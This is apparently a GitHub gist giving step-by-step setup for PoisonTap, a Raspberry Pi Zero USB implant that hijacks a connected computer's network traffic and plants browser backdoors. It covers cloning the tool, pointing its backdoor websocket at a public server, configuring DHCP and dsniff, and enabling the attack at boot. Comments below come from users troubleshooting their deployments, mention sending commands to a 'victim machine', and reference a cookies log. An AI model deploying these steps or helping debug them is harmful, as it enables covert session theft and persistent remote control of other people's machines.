-
-
Save jgamblin/459d7db3b4e8441cc210b35abb5d7181 to your computer and use it in GitHub Desktop.
##Server: | |
sudo apt-get update && apt-get upgrade | |
sudo apt-get install screen nodejs nodejs-legacy git npm | |
sudo npm install websocket | |
git clone https://github.com/samyk/poisontap | |
screen | |
sudo node backend_server.js | |
##piZero: | |
sudo apt-get update && apt-get upgrade | |
sudo apt-get -y install isc-dhcp-server dsniff screen nodejs git | |
git clone https://github.com/samyk/poisontap | |
Update ws://YOUR.DOMAIN:1337 in backdoor.html to your public IP | |
ws://poisontap.jgamblin.com:1337 | |
#add this to /etc/network/interfaces: | |
auto usb0 | |
allow-hotplug usb0 | |
iface usb0 inet static | |
address 1.0.0.1 | |
netmask 0.0.0.0 | |
#Setup to run at boot: | |
sudo cp /home/pi/poisontap/pi_startup.sh /etc/init.d/ && sudo chmod +x /etc/init.d/pi_startup.sh | |
add this to /etc/rc.local right above exit 0: | |
/etc/init.d/pi_startup.sh & | |
#DHCP: | |
sudo cp -f dhcpd.conf /etc/dhcp/dhcpd.conf | |
add this to /etc/default/isc-dhcp-server: | |
INTERFACES="usb0" |
@Stephen2929 have you had success with the server side? (I finally got it working, the tutorial above is not very good, not to everyone: use the link I posted, and do part 2 before part 1) But when sending commands on the server, nothing is getting sent to the victim machine. I see that it was sent, and then on the screen that the backend is running on I see that it was requested. But when I send commands, like and alert command, nothing happens on the victim machine. Going through all of the logs I cannot see any evidence of anything being sent to the machine. Also, when looking at the network graph, samy's has lots of color. Mine is mostly gray however, and in the console I am getting 404 on almost all domain/poisontap links (I assume that is normal because those links don't actually exist. Any help would be greatly appreciated.
Edit: Update
I tried all steps describe in pi.txt but raspberry pi zero is not able to create a virtual Ethernet port on windows 7 and windows 10. anyone else had same problem and sorted out? i will appreciate for any response. thanks
Same issue...followed all the pi.txt steps and still i havent got a new Ethernet device. Both on Windows 7,8.1 and 10. Perhaps some step missing?
When I type "git clone https://github.com/samyk/poisontap"
I get this response
Cloning into 'poisontap'...
remote: Counting objects: 396, done.
remote: Compressing objects: 100% (15/15), done.
error: RPC failed; result=56, HTTP code = 200
fatal: The remote end hung up unexpectedly
fatal: early EOF
fatal: index-pack failed
is this something I've done or on github side? or what? Thank you in advance for your help.
I monitor the /var/log/syslog and I see the DHCPDISCOVER and also the DHCPOFFER on the raspberry zero. I also monitor the traffic using wireshark on the victim computer, and only see the DHCPDISCOVER, therefore I'm stucked with 169.254.X.X IP address. Any ideea?
UPDATE: I made it work by reinstalling the base OS and NOT upgrading it with apt-get upgrade and BRANCH=next rpi-update. It seems that if I updated it, something went wrong, I don't know if the ethernet emulation or DHCP, since both seems to work fine at first preview. I think the ethernet emulation was to blame, since the ping between computer and raspberry didn't work, either I configured the computer with statical IP address!
does anyone have a tutorial on getting the back end server running I'm not having any luck with it
I too am getting this error on start up:
ln: failed to create symbolic link ‘configs/c.1/acm.usb0’: File exists
sh: echo: I/O error
sh: echo: I/O error
ln: failed to create symbolic link ‘configs/c.1/ecm.usb0’: File exists
ls: write error: Device or resource busy
ifup: interface usb0 already configured
SIOCADDRT: File exists
anyone knows if this is because I am setting up the device via usb ?
can someone please help @ajdulion how did you get this working?
@eliddell1 @ajdulion i have exactly the same problem, can you help me please ?
poisontap/poisontap.cookies.log